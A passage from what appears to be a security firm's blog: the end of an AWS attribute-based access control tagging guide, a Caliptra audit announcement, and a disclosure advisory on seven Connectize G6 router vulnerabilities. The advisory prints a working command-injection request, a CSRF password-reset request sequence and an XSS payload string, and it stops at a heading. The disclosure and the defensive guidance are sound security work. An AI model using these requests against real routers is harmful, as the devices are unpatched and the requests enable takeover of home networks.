        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
}

Now any principal that has a tag named “project” with the value “QuarkEagle” can publish to any SNS topic whose “project” tag is also “QuarkEagle” and any principal whose “project” tag is “CrunchyNugget” can publish to any topic that is also tagged “CrunchyNugget” — no need for permission policies that know about every tag value in use.

If your principals can create and delete SNS Topics, then you should make sure that they can only create properly tagged ones and can only delete ones with the proper tags. Similarly, if you allow your principals to set or unset tags, then you probably don’t want to allow them to change the “project” tag values on their resources. To enforce that, you might give them permission policy statements like this:

{
    "Effect": "Allow",
    "Action": [
        "sns:CreateTopic",
        "sns:TagResource"
    ],
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:RequestTag/project": "${aws:PrincipalTag/project}",
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": "sns:DeleteTopic",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": [
        "sns:TagResource",
        "sns:UntagResource"
    ],
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        },
        "ForAllValues:StringNotEquals": {
            "aws:TagKeys": "project"
        }
    }
}
  1. The first statement permits the principal to create SNS Topics so long as the each new Topic’s “project” tag has the same value as the principal’s “project” tag. Setting a tag during resource creation requires the same sns:TagResource permission as setting one explicitly later, so we grant permission for both actions. During resource creation, the condition key aws:ResourceTag is set to the value specified for the tag to be created, so the two condition checks are very similar but both are necessary to prevent the principal from using sns:TagResource in unintended ways:
    • Without the check against aws:RequestTag, the principal would be able to assign arbitrary tag values to existing Topics that currently share the principal’s “project” tag (potentially giving away those Topics to someone else; this could allow one principal to elevate the privileges of another, useful in a scenario where someone has compromised two different principals, neither of which can do what the attacker wants).
    • Omitting the aws:ResourceTag check would allow the principal to re-tag arbitrary existing Topics to its “project” tag value (allowing it to take control of other Topics and likely elevating its privileges if the principal has other permissions allowing it to read from or write to Topics that share its “project” tag).
  2. The second statement permits the principal to delete SNS Topics whose “project” tag have the same value as the caller’s “project” tag.
  3. The third statement enables the principal to change the tags on existing SNS Topics. The first condition, using aws:ResourceTag, requires that the target Topic’s “project” tag have the same value as the caller’s “project” tag. The second condition, using aws:TagKeys, prevents the caller from changing the value of the Topic’s “project” tag. Note that due to the first statement, it’s still possible for the principal to set a Topic’s “project” tag, but only if the value is the caller’s “project” tag.

ABAC permissions policies are easy to get wrong. Even Amazon has difficulty with them: AWS’ public documentation contains a number of example permission policies similar to the first statement above that do not contain the “StringEquals”: { “aws:ResourceTag/project”: “${aws:PrincipalTag/project}” } condition. Make sure that any ABAC permission policies that you write or review cover all scenarios.

It’s also important that your principals can’t change the “project” tags on themselves. If you need to allow your principals to call iam:TagUser and iam:UntagUser (or their equivalents for Roles), then you should use similar permission policies to prevent them from removing or changing the values of their “project” tags.

If you want to enforce some order on what tags are applied, then you can use a permission policy statement such as the following to prevent principals from setting any tags other than “department”, “project”, and “stage” on SNS Topics:

{
    "Effect": "Deny",
    "Action": "sns:TagResource",
    "Resource":"arn:aws:sns:*:*:*",
    "Condition": {
        "ForAnyValue:StringNotEquals": {
            "aws:TagKeys": [
                "stage",
                "project",
                "department"
            ]
        }
    }
}

A similar permission policy statement employing aws:RequestTag/… can be used to control the values that may be assigned to tags.

Some services offer a condition key that can be used to make a permission policy statement apply only during resource creation (such as EC2’s ec2:CreateAction); using such a condition in your Policies can make them simpler and easier to understand. For instance, the following permission statement allows a principal to create tagged EC2 resources without allowing any weird ec2:CreateTags abuses:

{
    "Effect": "Allow",
    "Action": [
        "ec2:CreateSecurityGroup",
        "ec2:CreateImage",
        "ec2:CreateVolume"
        "ec2:RunInstances"
    ],
    "Resource":"*",
    "Condition": {
        "StringEquals": {
            "aws:RequestTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": "ec2:CreateTags",
    "Resource": "arn:aws:ec2:*:*:*",
    "Condition": {
        "StringEquals": {
            "ec2:CreateAction": [
                "CreateSecurityGroup",
                "CreateImage",
                "CreateVolume"
                "RunInstances"
            ]
        }
    }
}

The first statement permits the caller to create a few different EC2 resources so long as they have the same “project” tag value as the caller. Actually setting that tag, even during resource creation, requires a permission for ec2:CreateTags, so the second statement allows the caller to create tags only from those resource-creation API actions. However, this approach has its own flaws: EC2 considers ec2:CreateTags to be a resource-creation action, so make sure that any wildcards that you use in the ec2:CreateAction condition check don’t match ec2:CreateTags.

With proper use of tagging, combined with separate VPCs, it may be possible to put separate applications and separate stages of each application in the same account without allowing, for instance, beta principals to access prod data. Not that I’d recommend this approach: getting the tagging right is a lot of work (and there are many gotchas; see below). If you’re building a new application, it’s usually safer (and easier) to just use separate accounts for each application and stage with cross-account access via Role assumption and VPC peering as needed. But it’s worth considering for big complicated accounts with access control problems: it may be less work to implement ABAC on top of existing applications than it is to disentangle a giant messy account.

Manipulating tags

AWS services that support tagging have API actions to add and remove tags from resources and to list the tags on a resource. Tagging support was added to many AWS services well after they were first released and ABAC support was grafted on later still. As a result, the implementation of tagging isn’t consistent between services.

The most common patterns for API action names are:

  • TagResource / UntagResource / ListTagsForResource: a single set of API actions for all taggable resources in the service. One of the arguments is a resource ARN; if the service supports more than one type of resource, it figures out the resource type and what to do from there based on the ARN. One or more tags can be set or removed at once. This seems to be the most common pattern, used by Lambda, SNS, DynamoDB, and other services. However, there is a lot of variation in the name of the tag-listing operation: sns:ListTagsForResource, lambda:ListTags, dynamodb:ListTagsOfResource, apigateway:GetTags, kms:ListResourceTags, etc. Some services don’t have a tag-listing operation at all, allowing tags to be retrieved only using other resource-description API actions (e.g., Secrets Manager). There are also several variations on this pattern:
    • AddTagsToResource / RemoveTagsFromResource / ListTagsForResource: these API actions tend to work just like in the above case only with different names. This pattern is used by RDS and SSM.
    • AddTags / RemoveTags / ListTags, used by CloudTrail.
    • CreateTags / DeleteTags / DescribeTags, used by EC2 and Workspaces. In EC2’s case, ec2:DescribeTags doesn’t operate on a single resource but rather returns information about every resource in EC2 (with optional filters to limit the response to certain specific resources, resource types, etc.).
  • Tag<Resource> / Untag<Resource> / List<Resource>Tags: separate sets of API actions for each taggable resource. You need to call the correct API action for the type of resource that you want to tag and provide a resource name or ARN. As above, you can generally set or remove one or more tags at once. This pattern is followed by IAM and SQS (some specific examples: iam:TagUser, sqs:UntagQueue, iam:ListRoleTags). Certificate Manager uses a variation on this pattern: acm:AddTagsToCertificate / acm:RemoveTagsFromCertificate / acm:ListTagsForCertificate.

Most resource-creation API actions allow tags to be assigned during resource creation. Assigning a tag this way requires the permission for the tag-setting API action in addition to the resource-creation API action. For instance, to create an SNS Topic, I need permission for the action “sns:CreateTopic“. If I set a tag on a Topic while creating it, then I also need permission for the action “sns:TagResource” even if I never directly call that API action. However, there may still be some resources that support tagging but cannot be tagged at creation or cannot be tagged when created using CloudFormation.

The syntax for setting tags using AWS CLI also differs between services. Most services’ resource-creation and tagging API actions use a “–tags” command-line argument followed by a list of tags to set, but how that list is formatted depends on the service. Some services (including SQS and Lambda) expect “–tags project=QuarkEagle,stage=beta” while others (such as SNS and SSM) expect an argument of the form “–tags Key=project,Value=QuarkEagle Key=stage,Value=beta“. EC2 is an exception; during resource creation, it uses a more elaborate form of the latter syntax: “–tag-specifications ‘ResourceType=security-group,Tags=[{Key=project,Value=QuarkEagle},{Key=stage,Value=beta}]’“.

If you were thinking that it would be really nice for AWS to provide a unified tagging API, you’re not alone. AWS Resource Groups has a tagging API that can operate on most AWS services that support tagging. Besides providing a generic interface to tagging and untagging, this service also provides ways to retrieve all tag keys and values currently in use by an account and to query resources by tag across multiple services. From AWS Console, you can use “aws resourcegrouptaggingapi tag-resources …” to apply tags to arbitrary resources. To do this, you need both a “tag:TagResources” permission and a tagging permission for the resource that you are trying to tag. Untagging is similar. The following is a minimal permission policy to allow a principal to apply tags to a specific SNS Topic (resource constraints aren’t supported on the tag:TagResources permission because the resources are not in the Resource Groups service):

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sns:TagResource",
            "Resource": "arn:aws:sns:us-east-1:111111111111:some-topic"
        },
        {
            "Effect": "Allow",
            "Action": "tag:TagResource",
            "Resource": "*"
        }
    ]
}

Special Cases

S3 is the special snowflake; there’s a reason why I didn’t use it for my examples above. While most AWS services have API actions that add or remove individual tags, the S3 tagging API operates on the entire set of tags on the object at once: s3:PutObjectTagging and s3:PutBucketTagging replace the full set of tags on the target resource with the given set, while s3:RemoveObjectTagging and s3:RemoveBucketTagging remove all tags from the target resource. If an object has the tags “application”, “stage”, and “owner” and you want to change the value of “owner”, then your call to s3:PutObjectTagging needs to set the “owner” tag to its new value and the “application” and “stage” tags to their current values in order to not lose the other tags. Tags can be retrieved using s3:GetObjectTagging and s3:GetBucketTagging. Unfortunately, the Resource Groups Tagging API does not support objects in S3 so it does not provide a work-around for S3’s weird tagging implementation.

To make the S3 case even more complicated, both Buckets and objects can be tagged but S3 only supports ABAC on objects. Even that support is incomplete: ABAC is not supported for s3:PutObject, s3:DeleteObject, or s3:DeleteObjectVersion calls. S3 also doesn’t support the normal aws:ResourceTag, aws:RequestTag, and aws:TagKeys condition keys at all: you must use S3-specific condition keys:

  • s3:ExistingObjectTag/<tag-name>: control access based the values of tags attached to objects.
  • s3:RequestObjectTag/<tag-name>: control the tag values that can be assigned to or removed from objects.
  • s3:RequestObjectTagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.

There may be other services with unusual tagging implementations; I haven’t checked all of them. EC2 has its own tagging condition key “ec2:ResourceTag” but that seems to be a synonym for aws:ResourceTag.

Limitations of AWS ABAC

Unfortunately, ABAC support across AWS is incomplete (though improving) and has many implementation inconsistencies across services. Quirks of AWS’ ABAC implementation include:

  • Some services do support tagging but don’t support ABAC; others support ABAC on only some types of resources or in some contexts. There may yet be some services that don’t support tagging at all. The following table, describing ABAC support for a number of frequently-encountered AWS services, is summarized from Amazon’s documentation:
    Service ABAC support?
    EC2 Yes
    S3 Partial support for objects using non-standard condition keys; no support for Buckets
    Lambda For Functions but not for other resource types
    DynamoDB No
    RDS Yes
    IAM Users and Roles only, with exceptions
    Certificate Manager Yes
    Secrets Manager Yes
    KMS Yes
    CloudTrail Yes
    CloudWatch Mostly
    CloudFormation Yes
    API Gateway Yes (though not for API authorization)
    CloudFront Yes
    Route 53 No
    SNS Yes
    SQS Yes (added in fall 2022)

    Details on some of those limitations:

    • IAM: it is not possible to limit who can pass a Role using tags on that Role. While it is tempting to try to limit overly-permissive iam:PassRole permissions by allowing principals to pass only Roles with specific tags, that won’t work.
    • S3: it is not possible to limit who can delete or overwrite an S3 object based on tags on that object, nor is it possible to control access to API actions that operate on Buckets using tags. S3 also doesn’t support the normal condition keys for tags, instead using its own.
    • CloudWatch Logs doesn’t support limitations on the tags that can be assigned to Log Groups and doesn’t support aws:ResourceTag/<tag-name> for logs:DescribeLogGroups.
  • As previously noted, the tagging APIs and available condition keys for tagging are not consistent, either in name or function, across all AWS services. As a result, make sure to thoroughly review or test ABAC policies, especially if they contain Deny rules based on tagging. It won’t do to attempt to restrict access to S3 objects using aws:ResourceTag/<tag-name> because that condition key won’t exist: you need to use s3:ExistingObjectTag/<tag-name>. It also won’t do to treat s3:PutObjectTagging like you do iam:TagUser in your permission policies because they work differently.
  • Also as noted above, AWS’ pattern of requiring a tagging permission to assign tags while creating a resource makes it altogether too easy to accidentally give principals excessive tagging permissions. Carefully review all permission policies that permit tagging during resource creation.
  • In most cases, tag names are case-sensitive: “Project” is a different tag than “project“. However, this is not entirely consistent across services. Tags on IAM Users and Roles (though not on other IAM resources) are case-insensitive.
  • Some services (such as Secrets Manager) won’t let a principal change a tag if that change would prevent that principal from accessing the resource after the change. Other services (such as SNS) do not have this restriction.
  • There are some random bugs and missing functionality in various services.  SQS doesn’t support aws:ResourceTag in resource-based permission policies. EC2 doesn’t support aws:ResourceTag checks during resource creation; you must use the EC2-specific condition key ec2:CreateAction to protect your tag-on-create permissions for EC2. CloudTrail seems to support aws:ResourceTag only after Trail creation and doesn’t seem to support aws:RequestTag or aws:TagKeys at all. There are probably a few other similar bugs out there.

Hopefully AWS’ ABAC support will continue to improve over time.

More information

Public Report – Caliptra Security Assessment

18 October 2023 at 18:26

During August and September of 2023, Microsoft engaged NCC Group to conduct a security assessment of Caliptra v0.9.

Caliptra is an open-source silicon IP block for datacenter-focused server-class ASICs. It serves as the internal root-of-trust for both measurement and identity of a system-on-chip. The main use cases for Caliptra are to assure integrity of mutable code, to authorize firmware updates, and to support secure platform configuration and lifecycle state transitions. Notably, Caliptra also implements the TCG DICE Protection Environment, enabling other entities within the SoC to leverage the unique device identity for their own security operations.

Our evaluation of Caliptra spanned the three primary components:

  • ROM: The immutable mask ROM, which executes when Caliptra is brought out of reset.
  • First Mutable Code: Started by the ROM, the FMC is responsible for loading the runtime.
  • Runtime Firmware: The services that Caliptra provides to the rest of the SoC.

Microsoft furnished NCC Group with several testing objectives and focus areas for this project. These requirements were related to upholding the properties of confidentiality, integrity, and availability for the DICE Protection Environment and its security-critical assets:

  • Ensure that the firmware loading and authentication processes cannot be bypassed.
  • Review DPE signing operations for side-channel information leakage, impacting the Unique Device Secret or Composite Device Identifier.
  • Prevent attacks that undermine DICE initialization and external firmware measurement.
  • Ensure that measurements cannot be silently dropped or excluded from DPE derivations.
  • Determine whether an attacker can malform the DPE context tree structure.
  • Determine whether risks are present due to leaving cryptographic material in memory.
  • Under debug, DPE certificates should not chain to vendor-signed DeviceID certificates.
  • Assess the effectiveness of Caliptra’s exploit mitigation technologies.
  • Assess the soundness of the fault injection countermeasures.

The assessment identified 26 vulnerabilities, which were promptly addressed by the Caliptra team prior to the publication of this report. Read the full report here:

The audit was performed under the umbrella of the Open Compute Project’s (OCP) Security Appraisal Framework Enablement (SAFE) program, which was recently announced at the OCP Global Summit. More details about SAFE can be found in GitHub, here, including the short-form report for Caliptra’s ROM, FMC and Runtime firmware.

Since May of this year, NCC Group has been collaborating with the OCP by sharing our expertise in hardware and firmware security to support the creation of the SAFE program and the definition of its testing methodologies and reporting outputs. NCC Group is an approved SAFE Security Review Provider.

Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE-2023-24052)

19 October 2023 at 13:53

Connectize’s G6 WiFi router was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local Wi-Fi network and browser. The Connectize G6 router is a general consumer Wi-Fi router with an integrated web admin interface for configuration, and is available for purchase by the general public. These vulnerabilities were discovered in firmware version 641.139.1.1256, and are believed to be present in all versions up to and including that version.

A total of seven vulnerabilities were uncovered, with links to the associated technical advisories, as well as detailed descriptions of each finding, below.

  1. Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
  2. Systemic Insecure Credential Management (CVE-2023-24047)
  3. Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)
  4. Weak Default Wi-Fi Network Password (CVE-2023-24049)
  5. Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
  6. Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
  7. Current Password Not Required When Changing Admin Password (CVE-2023-24052)

Attack Scenarios

The nature of these vulnerabilities allows a motivated attacker to perform an attack chain combining multiple of these issues, potentially leading to full unauthenticated access to the admin panel, a pivot point on the user’s home network for further attacks, and arbitrary JavaScript code execution in the victim’s browser.

Scenario 1 – Attacker Not on the Network

An attacker not present on the Wi-Fi network can obtain a foothold onto the network, as well as total admin panel compromise, via the following steps. First, the attacker sends a phishing email to the target. The email induces the victim into visiting the attacker’s website, and allows the attacker to send HTTP requests from the victim’s browser. If the victim is logged in to the administration panel of their router, the attacker can leverage CVE-2023-24048 to send requests to the web application on the victim’s behalf, effectively granting them administrative access at this time.

However, this is temporary – the attacker only has this access while the victim remains logged in to the administrative panel. The attacker’s next step is to change the victim’s password, guaranteeing them access to the admin panel and locking out the victim. They can perform this easily, as no prior passwords are required to perform this sensitive action (CVE-2023-24051).

From here, they can utilize CVE-2023-24046 to pivot their attack, as this vulnerability grants the attacker complete command line access to the router itself, and in doing so, gives the attacker a device on the victim’s network that they control. From here, they could transition to traditional network based post-exploitation attacks, such as sniffing traffic and attempting to exploit vulnerabilities on other machines in the network. Furthermore, due to the known insecure hashing algorithms used to protect the sensitive router credentials (CVE-2023-24047), they can ensure that even in the event they lose access to the admin panel, they can recover the password by checking the router’s /etc/passwd file.

Scenario 2 – Attacker on the Network

Alternatively, rather than starting with a targeted phishing attack, an attacker who already has access to the home network (such as a guest in the home) could attempt to elevate from a normal use to an administrator via brute force password guessing.

The admin panel has an account lockout preventing such things – after making three failed guesses, a user is informed they must wait 180 seconds before attempting another guess. However, as shown in (CVE-2023-24051), the attacker can refresh the browser to reset this timer, or could use automation to send these requests without the browser pop-up’s interference in the first place.

If the victim has set a strong password, this will still take a significant amount of time. However, as the router requires a minimum length of 5 characters rather than the industry-standard recommended minimum of 8 characters, it becomes a viable attack surface if the chosen password is weak. If the password was never changed from the default value – admin, the attacker can gain access in one guess (CVE-2023-24049).

They can, of course, also exploit any of the vulnerabilities noted under Scenario 1 in addition to the brute force approach.

Scenario 3 – Malware

Assuming our attacker has gained access to the admin panel, either via CSRF or via the brute force method, the attacker can choose to perform further exploits via cross-site scripting. They could choose to set the password for one of the two Wi-Fi networks (2.4 GHz or 5 GHz) to an exploit string, and upon the rightful admin logging in to investigate, the attacker is able to run arbitrary JavaScript on the attacker’s browser.

Disclosure

NCC Group attempted to get in contact with Connectize’s support team, reaching out via a customer support email address. After receiving no response to our initial email or a follow up email a reasonable amount of time later, it was decided to publicly release the following advisories in accordance with NCC Group’s responsible disclosure policies. From web searches and open source research, it appears that the Connectize vendor ceased trading some time in early 2023 – the last cached version of their website on the Internet archive was March 29th 2023. Their website no longer exists and there is no mechanism to contact them. The disclosure timeline can be found at the bottom of this page.

It is important that consumers are aware of the vulnerable Connectize devices. Any current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Similarly, for consumers looking to purchase a Wi-Fi router – be aware that at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background NCC Group is currently liaising with some of these online stores in an attempt at ensuring these devices are withdrawn from sale.

Technical Advisories

Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24046
Severity: High 8.4 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Summary

An attacker authenticated to the admin panel can run arbitrary commands on the physical device.

Impact

After exploitation, an attacker will have complete control over the target system, and will be in a position to perform post-exploitation tasks throughout the network.

Details

The ping functionality on the router diagnostics page http://192.168.5.1/diag_ping_admin.htm is used to set the IP address pings are sent to. However, an attacker can concatenate a command to the end of the address as follows, which then executes as a command on the underlying system.

The following request shows the output of the ls command, listing the files and directories at the root of the HTTP server.

Request

GET /getPingResult.asp?ip_version=0 target_addr=192.168.5.1;+ls; target_num=2 HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.5.1/diag_ping_admin.htm

Response

HTTP/1.1 200 OK
Date: Tue, 10 Jan 2023 22:59:36 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Content-Length: 371
Last-Modified: Tue, 10 Jan 2023 22:59:36 GMT
Content-Type: text/html

PING 192.168.5.1 (192.168.5.1): 56 data bytes
<br />64 bytes from 192.168.5.1: seq=0 ttl=64 time=0.293 ms
<br />64 bytes from 192.168.5.1: seq=1 ttl=64 time=0.262 ms
<br />
<br />--- 192.168.5.1 ping statistics ---
<br />2 packets transmitted, 2 packets received, 0% packet loss
<br />round-trip min/avg/max = 0.262/0.277/0.293 ms
<br />boa.conf
<br />mime.types
<br />

Observe the lines:

<br />boa.conf
<br />mime.types
<br />

These file names are present at the root of the /etc/boa directory of the router, indicating that the ls command successfully executed and the output was returned to the user.

An attacker can go further with this and construct a convenient user interface for interacting with the vulnerability in a shell-like manner. With such a shell an attacker can much more easily navigate the file system and run commands on the device. They can then elevate their access to something more direct, such as through activating the BusyBox Telnet functionality on the device and obtaining a telnet shell.

Recommendation

Connectize should implement input verification to be certain that the values passed to the target_addr parameter are only IP addresses, and do not contain any commands. Any value passed that is not an IP address or a domain name parameter should be dropped.

Systemic Insecure Credential Management (CVE-2023-24047)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24047
Severity: Medium 4.5 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

Summary

The same password used for logging into the web admin interface is used as the root password for the device. Furthermore, the password is stored insecurely on the device via an outdated and insecure hashing algorithm.

Impact

Anyone capable of accessing the router’s file system is able to trivially recover both the Root password for the device and the password for the admin panel.

Details

The Connectize Router uses the admin panel password, as set by the user, as the root password on the device. The password is stored in /etc/passwd, and appears to be hashed using DES. DES is a known insecure hashing algorithm that should no longer be used. Because this hash can be performed very quickly, hashed passwords are vulnerable to brute-force cracking. An attacker with access to the hashed passwords is likely to be able to recover significant numbers of plaintext passwords using a tool such as hashcat.

Several other important passwords, such as the SMB fileshare password, were also observed to be hashed using DES.

Recommendation

Update the hashing algorithms used for device credentials to a more secure, modern algorithm. Furthermore, consider setting the root machine password to it’s own unique value, rather than setting it by the admin configuration panel password.

Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24048
Severity: Medium 7.5 (CVSS v3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

Summary

The web application authentication relies on state tracking to ensure that the user is properly authenticated. This can be bypassed, allowing unauthenticated users to submit requests to the application under certain conditions.

Impact

If an authenticated user visits an attacker-controlled website, the attacker could induce the victim’s browser to send local requests to the application on behalf of the victim user. These requests could be used to make changes to the site, such as changing the admin password or configuring remote logs. It could also be used to leverage other vulnerabilities, such as CVE-2023-24046, a command line injection vulnerability.

In order to perform this attack, the victim must be logged in to the administration panel on the device’s network, but the attacker can be positioned anywhere on the public internet.

Details

The Connectize admin panel application appears to track authentication via two mechanisms. First, ensuring the user is logged in (likely via IP based or MAC address based verification). Next, it tracks the recent actions taken by the user in an attempt to verify that the request was sent as part of the typical user activity flow. This second check can be bypassed in a way that grants any individual who launches a phishing campaign against a logged-in administrator access to the admin panel. This can be done using an attack known as CSRF, which is explained below.

The lack of sufficient protections illustrated in this finding apply to the whole application, but are most significant in the user flow for changing the administrator password. This flow begins with a POST request to /boafrm/formPasswordSetup.

POST /boafrm/formPasswordSetup HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://192.168.5.1
Connection: close
Referer: http://192.168.5.1/man_password.htm

submit-url=%2Fman_password.asp saveFlag=0 userName=admin newPass=myPassword confPass=myPassword

If a user sends this request without being logged in, they are redirected to the login page. If, however, a user sends this request while being logged in but before they have accessed the password request page at http://192.168.5.1/man_password.htm, they are assumed to have bypassed the normal user flow of the application and served a 403 Forbidden error. This appears to be intended to insure that only the authenticated user may send requests to the application as part of normal administrative duties.

However, an attacker can successfully fill the required conditions for this request by simply sending a HTTP GET request to the man_password.htm page, such as the following.

GET /man_password.htm HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.1/advanced.htm
Connection: close
Upgrade-Insecure-Requests: 1

They then receive a HTTP 200 response containing the contents of the web page.

An attacker, therefore, could bypass this check and allow themselves to programmatically change the password by simply using a tool or writing a script that sent the GET request to /man_password.htm shortly before performing the POST request to /boafrm/formPasswordSetup and changing the administrator password.

This attack can be through a phishing attack prompting the victim to navigate to an attacker’s website. The webpage would be configured as follows: Upon browsing to the website, the page sends a GET request from the victim’s browser to the address http://192.168.5.1/man_password.htm. If the victim has a Connectize G6 router and is currently logged in to the admin panel, this will respond with a 200 OK. The webpage would then send the second request, a POST request to http://192.168.5.1//boafrm/formPasswordSetup. This request will reset the victim’s router, and change the admin password to anything the attacker desires. They then have complete control of the router, and can send additional requests using their phishing site to make changes and configure the application as they wish. They could even make use of other findings, such as CVE-2023-24046, to take complete command of the device.

This type of attack is known as Cross-Site Request Forgery (CSRF). It is characterized by an attacker using a logged in victim’s session to perform actions on their behalf. CSRF is typically an attack that requires the victim to open the vulnerable website and the attacker’s phishing website, to transfer authentication cookies along with the requests. However, because the Connectize G6 router does not make use of session tokens, authentication cookies, or CSRF tokens, the attack works even if the phishing website is viewed in a different browser on the same machine that the victim had loaded the Connectize G6 admin panel on.

Recommendation

Implement a CSRF token as part of the authentication model. If possible, replace the state-based authentication with a more traditional authentication system, such as session cookie based authentication.

Applications can be protected from CSRF attacks by rejecting state-changing requests that do not originate from the application itself. The primary method of verifying that a request originated from the application rather than an external site is to require all state-changing requests to contain an extra parameter known as a CSRF token. These tokens are random values generated by the server, then returned to the browser in the body of a response or in a cookie submitted as an additional parameter with every request.

Because an attacking site cannot read the application’s cookies or responses, they will be unable to submit the correct value, and any forged request will be rejected.

Weak Default Wi-Fi Network Password (CVE-2023-24049)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24049
Severity: Medium 4.6 (CVSS v3.1 AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L)

Summary

It was found that the default password to both the router and the admin panel of the Connectize G6 router were trivially guessable by attackers, and are not required to be reset upon initial configuration.

Furthermore, the router provides the option to automatically set the admin panel password to the same password used to connect to the Wi-Fi.

Impact

An attacker present on the 2.4 or 5 GHz Wi-Fi Networks could trivially guess both the Wi-Fi network password and the admin password, if they have been left unchanged from their factory default. This would allow the attacker to gain complete admin access to the router.

Additionally, in some configurations, a user with credentials sufficient to connect to the Wi-Fi network could have full admin access to the router by default.

Details

The device default Wi-Fi password is admin, as described both in the router instruction manual and the sticker at the bottom of the sheet. This password can also be used to log on to the configuration panel.

Upon initial setup, the user is prompted to set a new password. However, they can bypass this by selecting the “Skip Wizard” option, leaving the passwords at the default.

Furthermore, if a user does proceed to set a new Wi-Fi password, they are presented with a checkbox that sets the admin panel login password to the same value as the Wi-Fi password. This grants full administrative access to all users with access to the Wi-Fi password, even when a non-default password is used.

Recommendation

Connectize should ensure that the router requires users to always change the Wi-Fi password from default upon first login, and should remove the “Skip Wizard” functionality that allows users to bypass this.

Additionally, Connectize should remove the option to set the admin interface password to the same password as the Wi-Fi password shown during initial configuration.

Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24050
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L)

Summary

An attacker who can change the Wi-Fi password can change the password to a carefully crafted Cross Site Scripting string, such as "><script>alert(1)</script>. This string is stored in the router’s data storage application, then incorporated in pages throughout the application, allowing an attacker to run arbitrary JavaScript whenever the string is loaded onto a page.

As this finding requires an attacker to be authenticated, the impact is somewhat limited. However, it can be exploited unauthenticated when combined with attacks such as CVE-2023-24048. Additionally, in a circumstance where multiple individuals share the admin panel credentials, one user could run arbitrary JavaScript in the browsers of all other users.

Impact

An attacker that has gained access to the admin panel can run arbitrary JavaScript code whenever anyone logs in or views various pages in the admin panel. This could be used to query external webpages, steal sensitive information, or perform other privileged actions.

Details

Cross-site scripting (XSS) is a vulnerability class related to web application input and output validation. In stored cross-site scripting, the application accepts input from an end user, stores it, and later displays it without properly encoding HTML metacharacters. This allows an attacker to inject JavaScript code into future views of the resulting page. A user may fall victim to the attack just by using the application, provided that they have connected to either of the Wi-Fi networks or the LAN network provided by the router.

The attacker does not need to change the passwords for both the 2.4 and 5 GHz bands. Simply changing one is sufficient, potentially allowing this attack to go undetected by people using the other network.

Recommendation

